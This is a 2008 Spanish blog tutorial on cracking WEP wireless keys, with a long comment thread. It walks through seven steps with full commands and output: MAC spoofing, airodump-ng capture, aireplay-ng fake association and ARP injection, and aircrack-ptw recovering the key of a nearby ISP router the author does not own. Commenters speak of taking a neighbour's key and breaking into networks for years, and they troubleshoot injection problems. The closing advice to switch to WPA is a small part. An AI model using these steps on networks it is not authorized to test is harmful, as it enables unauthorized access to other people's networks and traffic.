Auditando contraseñas WEP en 7 pasos.

Pues aquí me tienen, una vez que encontré una antena que me funcionara y al ver que había varias redes disponibles no me pude aguantar las ganas de auditar las contraseñas WEP que encontré a mi alrededor.

Hago la aclaración de que esta es una auditoría de seguridad pero les puedo adelantar la conclusión: La configuración por defecto de los accesos inalámbricos de Infinitum es altamente insegura.

Material necesario.

  • Tarjeta de red inalámbrica, en mi caso use la que siempre me ha acompañado en este blog, la multimencionada ENUWI-G2.
  • Una antena, esta es opcional, pero se puede utilizar para mejorar la calidad del enlace, puede ser la EZ-12 o la del escurridor de aluminio que a mi me ha funcionado muy bien.
  • Una distribución de Linux, utilicé wifiway porque fue la que mejor me reconoció mi tarjeta de red inalámbrica, pero existen otras opciones como Wifislax o Bactrack .

Los pasos a seguir.

Hago la aclaración que esta serie de pasos es para wifiway, pero supongo que se pueden aplicar a las otras distros antes mencionadas. También modifique los datos reales, para proteger la identidad de los personajes (siempre quisé escribir eso :P ).

Todos estos pasos se ejecutan desde una terminal (terminalofóbicos abstenganse ;) )

1.- Verificar si se reconoció la tarjeta de red inalámbrica.

iwconfig

lo        no wireless extensions.

eth0      no wireless extensions.

Warning: Driver for device wlan0 has been compiled with version 22
of Wireless Extension, while this program supports up to version 20.
Some things may be broken...

wlan0     802.11b/g  Mode:Monitor  Channel=1  Bit Rate=11 Mb/s   
          Tx-Power=11 dBm   
          Retry:on   Fragment thr:off
          Link Quality=84/100  Signal level=-236 dBm  Noise level=-240 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

Como pueden ver si la reconoció, la tarjeta es la wlan0, aunque me lanza una advertencia de que algo pude andar mal, y en efecto, la luz led de la tarjeta no prende, pero eso no evitó que funcionara para este experimento.

2.- Cambio de la mac address.

macchanger -m 00:11:22:33:44:56 wlan0

Current MAC: 00:11:22:33:44:55 (Cimsys Inc)
Faked MAC:   00:11:22:33:44:56 (Cimsys Inc)

Este paso lo realizo para no tener que acordarme de mi Mac Addres :)

3.- Búsqueda de las redes inalámbricas en los alrededores.

airodump-ng wlan0

 CH 13 ][ Elapsed: 2 mins ][ 2008-03-16 11:23 

 BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

 00:00:00:00:00:01    2        4        0    0   6  22. WEP  WEP         2WIRE000                                           
 11:11:11:11:11:11   15       53        0    0   1  54. WEP  WEP         INFINITUM0000                                      
 00:00:00:00:00:02    5       34        0    0   6  54. OPN              linksys

En estos resultados vamos a tomar nota de varios datos importantes.

Como pueden ver la red que tiene una mejor calidad de señal es la INFINITUM0000 ya que el valor de PWR myor que el de los demás.

De ahí tomamos el BSSID (11:11:11:11:11:11), el canal en que esta operando (Canal 1) y el ESSID (INFINITUM0000), elegimos esta red porque tiene a mejor calidad de enlace y un método de protección (WEP) muy pobre.

4.- Iniciar la captura.

Iniciando la captura

airodump-ng -w captura -c 1 wlan0

captura es el nombre del archivo que va a recibir la información que vamos a recolectar. Noten también que -c 1 indica que vamos a trabajar en el canal 1.

Es importante que no cerremos esta ventana, de lo contrario lo siguiente que hagamos no servirà de nada. Los siguientes pasos se hacen en una nueva terminal.

5.- Asociar la red inalámbrica.

aireplay-ng -1 0 -e INFINITUM0000 -a 11:11:11:11:11:11 -h 00:11:22:33:44:56 wlan0

11:26:36  Waiting for beacon frame (BSSID: 11:11:11:11:11:11)
11:26:36  Sending Authentication Request
11:26:36  Authentication successful
11:26:36  Sending Association Request
11:26:36  Association successful :-)

Sí aparece el mensaje de Association successful :-) estamos listos para continuar. Al principio batallé con este paso, si tienen algún problema es casi seguro que se trata de una mala calidad de señal, pueden estar muy lejos del punto de acceso inalámbrico.

6.- Iniciar la captura de paquetes.

aireplay-ng -3 -b 11:11:11:11:11:11 -h 00:11:22:33:44:56 wlan0

Saving ARP requests in replay_arp-0316-112829.cap
You should also start airodump-ng to capture replies.
Read 598 packets (got 214 ARP requests), sent 1172 packets...(78 pps)

En este punto hay que estar al pendientes, cuando se logren más de 100,000 ARP’s terminamos el proceso (presionando Ctrl+C). Se puede tardar de 10 minutos a media hora dependiendo de la calidad del enlace.

7.- Buscar el archivo .cap con mayor tamaño y encontrar la contraseña.

Llave encontrada

Se acuerdan que en el paso 4 establecimos el nombre del archivo como captura (de hecho puede ser cualquier nombre), bueno pues es normal que en ocasiones se guarde más de un archivo, se distinguen porque les sigue un número, el que debemos de elegir es el que tiene mayor tamaño. Que aquí fue el archivo número 2.

aircrack-ptw captura-02.cap

This is aircrack-ptw 1.0.0
For more informations see http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/
allocating a new table
bssid = 11:11:11:11:11:11  keyindex=0
stats for bssid 11:11:11:11:11:11  keyindex=0 packets=159646
Found key with len 05: 01 23 34 56 78

Y si todo salio bien en menos de 10 segundos obtendremos la contraseña, si en 10 segundos o menos, todo depende de la potencia de nuestro equipo.

Conclusiones.

Con eso es más que suficiente para encontrar la contraseña WEP de un enlace inalámbrico, lamentablemente este tipo de protección es el más utilizado por los Infinitum de Telmex por eso es poco recomendable dejar estos aparatos con su configuración de fabrica, lo mejor es ajustarla a otro tipo de protección como WPA, desconozco si lo 2wire lo permiten pero los linksys permiten restringir el acceso a ciertas Mac address lo que protege aún más una red inalámbrica.

Archivado en: Linux y Software Libre, Wireless | | March 16, 2008
Agregar a del.icio.us | Enchilame Enchilame esta

30 Comentarios »

Enlace Permanente | TrackBack

Gravatar Image

# 1 | jacob
March 16, 2008 @ 6:36 pm    

ahh que documento tan fregon!!!!!

Gravatar Image

# 2 | mirim1
March 17, 2008 @ 12:05 am    

asi es .. es lo mesmo en las demas distros… PUES EN HORA BUENA.. todavia me acuerdo de hace mas de 3 años que andaba esnifeando la ciudad.. jeje estaba tan insegura inalambricamente que casi entrabas al baño.. juar juar no se diga de megachafa que scaneas su red y wuala ay dios entras a las compus de los clientes… no se trata de ser paranoicos pero es una super obligacion de todo ingeniebrio perdon ingeniero que proteja su red y si no pa que esta ipcop.. PERO A POCO NO SE SIENTE LA ADRENALINA.. JEJE YA SON VARIOS AÑITOS HACIENDO LA VIOLACION DE ESTOS APARATILLOS DE POCA SEGURIDAD.. QUE SOLO ME QUEDA DECIR… YA DEJEN QUE LA SEÑAL INALAMBRICA SEA HABIERTA PORFAVOR.. YA AY PAISES EN EL MUNDO QUE HACE AÑOS A SU POBLACION ENTREGAN EL INTERNET GRATIS.. LO PEOR NOS VENDEN 4 MEGAS COMO SI FUERA LO ULTIMO DE LO ULTIMO.. CUANDO EL GOBIERNO ESPAÑOL 4 MEGAS ES LO QUE REGALAN EN SUS PLAZAS PUBLICAS.. NO SE DIGA DE JAPON QUE DE 60 MEGAS PASARON A 100.. PERO ESTO AQUI Y POR LO TANTO TE FELICITO POR TU MANUALITO TE ASEGURO QUE LE AHORRASTE MESES A VARIOS QUE ENTREN AQUI..

PERO RECUERDEN CHAVOS NO SE DEN BAÑO… NO PORQUE YA TIENEN UN ARMA.. LA TENGAN QUE USAR.. Y OTRA NO SEAN CARGADOS CON LOS P2P PORQUE ENTONCES EL VECINO SI VA PENSAR UN POQUITO MAL.. Y TE VERA CON CARA DE WAT. ESTE ES EL INGENIEBRIO QUE ME QUITA MI INTERNET Y VE MI PELICULAS POQUIS QUE TENGO GUARDADAS EN MI DISCO DURO.. JEJE NO SE CREAN PERO CASI CASI..

Gravatar Image

# 3 | Monillo007
March 17, 2008 @ 1:54 am    

Felicidades por el articulo Linuxman, te has aventado otro 10.

Yo andaba en las mismas solo que no he localizado un buen ‘escurridor de aluminio’para mi antena pero gracias a tu artículo ya tengo mi tutorial paso a paso.

Gravatar Image

# 4 | Diego Ariza
March 17, 2008 @ 1:10 pm    

Linuxman

Sin palabras exelente este articulo y tu blog.

Es la primera que lo visito.. y me parece estupendo ademas encuentro informacion sobre linux que no encuentro en varios foros y paginas.

Gracias por la informacion de la tarjeta de red encore. y la colocare en marcha.

Gravatar Image

# 5 | oviedo
March 18, 2008 @ 1:37 pm    

Justo lo que necesitaba, he encontrado manuales pero ninguno tan claro como el tuyo, espero ahora si poder ver la clave de mi vecino jeje.. ya que con los otros manuales nomas no logro obtener muchos ivs ojala ahora con el wifiway lo pueda conseguir.

Gravatar Image

# 6 | Jorge
March 18, 2008 @ 7:15 pm    

:S a mi me aparece un error a la hora de correr el aireplay-ng “is your bcm34xx driver patched”

Gravatar Image

# 7 | linuxman
March 18, 2008 @ 7:40 pm    

Usaste wifiway?? .. ya probaste Wifislax ?

Tu tarjeta de red es una broadcom?

Gravatar Image

# 8 | Jorge
March 19, 2008 @ 6:11 pm    

use wifiway, lo raro es que en PWR todas me aparecen con -1 pero si tengo cerca las conexiones…trate de entrar otra vez hoy pero no se ve bien wifiway al tratar de entrar y no puedo ajustarle nada del video al tratar de cambiar la resolucion me saca al menu principal :S
cabe destacar que soy un principiante en esto, pero con ganas :D

Gravatar Image

# 9 | linuxman
March 19, 2008 @ 6:48 pm    

Bueno pues puedes probar wifislax… o , cuando termina de cargar wifiway hay una opcion que dice autox (o algo parecido) para que te configure la pantalla antes de iniciar, si ya lo intentaste prueba sin esa opción

Gravatar Image

# 10 | jack
March 20, 2008 @ 12:22 pm    

Y digo yo, ¿como haces todo ello sin configurar la tarjeta en modo monitor?

Gravatar Image

# 11 | linuxman
March 20, 2008 @ 3:14 pm    

Misterios jack .. misterios :D , No eres Jack Bahuer .. ¿o si?

Gravatar Image

# 12 | kyokorn
March 25, 2008 @ 10:24 am    

Jorge los dirvers de la broadcom ya vienen parchados en wifislax, quiza te hace falta lanzar el driver desde el menu del wifislax prueba en asistencia chipset luego busca el de tu tarjeta broadcom, creo que desde la version 2 de wifislax vienen ya listos para modo monitor, creo pero no estoy seguro lo que si estoy seguro es que la version 3.1 funciona correctamente con el chipset de broadcom otra cosa si usas wifislax tendras que sustituit aireplay-ng por airplay-broadcom-ng esto porque hwagm compilo asi los drivers para que funcionaran correctamente. Saludos

Gravatar Image

# 13 | Rosapedo
March 31, 2008 @ 10:06 am    

Muy bueno el artículo Linuxman, pero me quda alguna dudilla que seguro que puedes resolverme. ¿Esto puede hacerse con un ordenador portátil? o necesito un ordenador de sobremesa para poder instalarle una tarjeta configurable en modo captura???
Mil gracias.
Un saludo.

Gravatar Image

# 14 | petesampras
April 1, 2008 @ 5:23 pm    

Linuxman
excelente tutorial, pero unas dudas, que version usaste del wifiway y como se hace que la tarjeta usb encore este en modo monitor?, puesto que yo tengo una igualita, saludos

Gravatar Image

# 15 | linuxman
April 1, 2008 @ 7:03 pm    

Que tal Pete… use la versión 0.8 de wifiway y los pasos que lees fueron los necesarios para lograr el objetivo.

Gravatar Image

# 16 | Antonio Martìnez
April 19, 2008 @ 8:48 pm    

Estoy apunto de lograrlo con una Broadcom con el wifislax 3.1, pero me kedo hasta el paso de inyecciòn, ya que todavia no logro configurar mi tarjeta para que haga inyeccion, he probado con los asistentes para cargar los mòdulos y parace que no funcionan con mi tarjeta, eh probrado el aireplay-broadcom-ng y nada.

Gravatar Image

# 17 | Antonio Martinez
April 19, 2008 @ 9:24 pm    

linuxman, tengo esa misma tarjeta ke usaste en el tutorial, con wifislax no puedo hacer que inyecte, probare con wifiway, hiciste algun procedimiento para configurar la tarjeta?

Gravatar Image

# 18 | Antonio Martínez
April 19, 2008 @ 10:05 pm    

Parece que no logre inyectar , ni con la broadcom ni con la ENUWI-G2 USB, pero parace que ya encontre la solución, probablemente fue el excaso trafico que habia aqui en mi casa, según la documentación oficial dice lo siguiente: “Puede que tengas que esperar un par de minutos, o incluso más, hasta que aparezca una petición ARP; este ataque fallará si no hay tráfico.”

Probablemente ese sea mi fallo, o tu que piensas?

Gravatar Image

# 19 | linuxman
April 20, 2008 @ 12:05 pm    

Intenta con wifiway y con la Enuwi-g2 esta fue la combinación ganadora… con wifislax no consegui mucho debido a que los driver de mi tarjeta no funcionaban.

Gravatar Image

# 20 | Fabian
April 20, 2008 @ 12:41 pm    

excelente Tuto… Pero tengo problemas al momento de asociarme a al router. Me indica Unsuccesful..! :-( , Mi terjeta es la integrada de ina Compaq, creo es Broadcom..! Pudieran ayudarme… Gracias!!

Gravatar Image

# 21 | Antonio Martínez
April 20, 2008 @ 1:15 pm    

Fabian: cambia un mac adress por una que puedas recordar facilmente:

Linuxman: ya probé con wifiway y es el mismo resultado, a la hora de inyectar, no me aparecen los arp, se queda sin hacer nada, esto con la wifislax y wifiway, que por cierto las 2 distros me las detecta bien la Enuwi-g2.

Otra cosa , cuando hiciste estos pasos con la INFINITUM0000, habia trafico en esa red?, es decir, habian personas conectadas trabajando normalmente ?

Gravatar Image

# 22 | linuxman
April 20, 2008 @ 3:36 pm    

Lo que ven es lo que uso y lo que me funcionó…
Fabian, Antonio:
¿Que tan lejos están del punto de acceso?, yo uso la antena del escurridor de aluminio para mejorar la calidad del enlace… Ustedes ¿Que usan?

Gravatar Image

# 23 | Antonio Martínez
April 20, 2008 @ 3:37 pm    

Ya logre sacar la clave wep, lo hice con la tarjeta inalámbrica Enuwi-g2, wifiway en una Desktop. Hice los mismos pasos de este tutorial y la logró sacar a la perfección.

Solo que tengo una duda muy grande, con la misma distro wifiway, con la misma tarjeta inalámbrica, pero con mi laptop dell inspiron 1521 no logro hacer la inyección, continua ese problema en mi laptop, que podra ser?

Gravatar Image

# 24 | linuxman
April 20, 2008 @ 3:54 pm    

Revisaste cuantas tarjetas inalámbricas estaban activadas en tu equipo portátil?

Gravatar Image

# 25 | Antonio Martìnez
April 20, 2008 @ 5:47 pm    

Si, me detecta las 2, la interna y la de USB, ya probe dando de baja la interna y hasta desactivando el modulo bcm43xx y aun nada. no inyecta :S

Gravatar Image

# 26 | linuxman
April 20, 2008 @ 10:00 pm    

Pues creo que ese detalle lo revisaremos en el flisol compañero :P

Gravatar Image

# 27 | Antonio Martínez
April 21, 2008 @ 5:19 pm    

Linuxman: Ya “correjí” mi problema, virtualicé wifiway en mi Debian y utilice la Inalámbrica enuwi =), me quedó la duda del porqué no inyecta tráfico de manera normal, tuve que virtualizarlo para que me detectara un hardaware genérico y así usar la usb sin problemas.

Gravatar Image

# 28 | linuxman
April 21, 2008 @ 6:47 pm    

Pues esta mejor, te ahorras varias reiniciadas virtualizando wifiway :D

Gravatar Image

# 29 | gabriel avila
April 23, 2008 @ 1:13 pm    

linuxman como se virtualiza, es diferente para cada distro, o por donde busco informacion

saludos y felicidades

Gravatar Image

# 30 | linuxman
April 23, 2008 @ 1:18 pm    

es simple… instala virtualbox, esta disponible en muchas distros de linux o si quieres, nos vemos en el flisol .. :P

RSS para los comentarios de este artículo.

Deja un comentario...

Los parráfos son automáticos, tu dirección de e-mail nunca será mostrada, los siguientes códigos en HTML están permitidos:<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <code> <em> <i> <strike> <strong>

Este es un espacio abierto, puedes escribir lo que gustes respetando los siguientes puntos: